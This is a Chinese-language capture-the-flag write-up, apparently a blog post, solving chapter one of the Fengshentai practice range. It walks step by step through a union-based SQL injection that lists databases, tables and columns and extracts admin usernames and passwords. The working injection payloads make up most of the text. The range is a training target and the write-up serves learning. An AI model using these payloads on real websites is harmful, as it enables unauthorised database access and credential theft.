封神台靶场 第一章:为了女神小芳!
目录
题目简述:
封神台靶场,题目链接

解题过程:
首先是这样的url为:
http://59.63.200.79:8003/

当点击点击查看新闻时,相应的url变化,变为如下:
http://59.63.200.79:8003/?id=1

寻找注入点
?id=1 and 1=1# 回显正常
?id=1 and 1=2# 回显异常
查看字段数
?id=1 order by 1,2# 回显正常

?id=1 order by 3# 回显异常

判断字段数为2
查看回显位置
得到回显位置为2
?id=20 union select 1,2#

查看版本信息
?id=20 union select 1,version()#

爆数据库名
?id=20 union select 1,database()#

爆表名
?id=20 union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()#

爆字段名
猜测所要的信息在admin表中
?id=20 union select 1,group_concat(column_name) from information_schema.columns where table_name='admin'#

获取字段值
?id=20 union select 1,group_concat(username,0x3a,password) from admin#

最后将hellohack作为flag提交即可。
总结
这个题目比较常规,算是又复习了一遍联合注入的知识,加深了印象。
本文详细记录了一次SQL注入攻击的过程,通过封神台靶场的第一章来展示。首先找到注入点,然后确定字段数、回显位置,接着暴露数据库名、表名和字段名,并最终获取字段值。通过一系列SQL语句,成功完成联合注入,获取到所需信息。此题帮助作者复习并巩固了联合注入的知识。
871

被折叠的 条评论
为什么被折叠?



